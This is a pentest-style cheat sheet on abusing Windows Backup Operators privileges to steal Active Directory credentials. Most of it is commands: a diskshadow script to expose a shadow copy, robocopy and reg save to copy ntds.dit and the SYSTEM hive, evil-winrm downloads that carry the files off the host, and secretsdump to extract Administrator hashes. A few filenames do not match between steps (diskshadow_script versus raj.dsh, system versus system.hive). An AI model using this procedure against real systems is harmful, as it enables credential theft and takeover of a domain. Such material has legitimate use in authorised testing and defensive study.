Backup Operators

Information

Backup Operators can back up and restore all files on a computer, including OS files, regardless of the permissions that protect those files. Because members of this group can replace files on DCs, they're considered service administrators.

Well known SID/RID: S-1-5-32-551.

Privilege	Description
SeBackupPrivilege	Allows us to create backups of any files, whilst not restoring their permissions, which equals to arbitrary read access.
SeRestorePrivilege	Allows us to overwrite legitimate executable files with versions that include malicious software used for privilege escalation.

Exploitation

nxc

If the controlled user has the SeBackupPrivilege, it can dump SAM, SYSTEM, SECURITY and therefore the NTDS.dit on the target system. No admin privs needed!

nxc smb <target-ip> -u <user> -p <pass> -M backup_operator

Diskshadow

Create a diskshadow script from the attack host to expose the c: drive:

# Create a diskshadow script
nano diskshadow_script
# List its content
cat diskshadow_script
set context persistent nowriters
add volume c: alias random
create
expose %random% z:
# Convert file into a Windows-compatible format
$ sudo unix2dos diskshadow_script
unix2dos: converting file diskshadow_script to DOS format...

Transfer the script to the target host and execute the following steps. In the example below, evil-winrm is used to transfer the files between the attack and the target host, via its upload and download methods:

# Move within a writeable directory
cd c:\windows\temp
# Upload the diskshadow script
upload diskshadow_script
# Expose the shadow copy
diskshadow /s diskshadow_script
# Copy the ntds.dit database
robocopy /b z:\windows\ntds . ntds.dit
# Copy the system.hive file
reg save hklm\system c:\windows\temp\system.hive
# Download both files
download ntds.dit
download system.hive

Dump the ntds.dit from the attack host:

impacket-secretsdump -ntds ntds.dit -system system.hive LOCAL | grep Administrator

For an example of the above method check here.

DLLs

Download the SeBackupPrivilegeUtils.dll and SeBackupPrivilegeCmdLets.dll from here on the attack host and transfer them to the target along with the diskshadow script found on the previous tab (on the example below evil-winrm is used):

# Move to a writeable directory
cd C:\Temp
# Upload files
upload diskshadow_script
upload SeBackupPrivilegeUtils.dll
upload SeBackupPrivilegeCmdLets.dll
# Import DLLs into memory
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
# Expose the shadow copy
diskshadow /s raj.dsh

Unlike Method 1, this time we will be using the Copy-FileSebackupPrivilege cmdlet (part of the DLL files) to copy the ntds.dit file from the z: volume to the Temp directory:

# Copy ntds.dit to Temp
Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\Temp\ntds.dit
# Copy system.hive
reg save hklm\system c:\Temp\system
# Exfiltrate files
download ntds.dit
download system

Dump the ntds.dit from the attack host:

impacket-secretsdump -ntds ntds.dit -system system.hive LOCAL | grep Administrator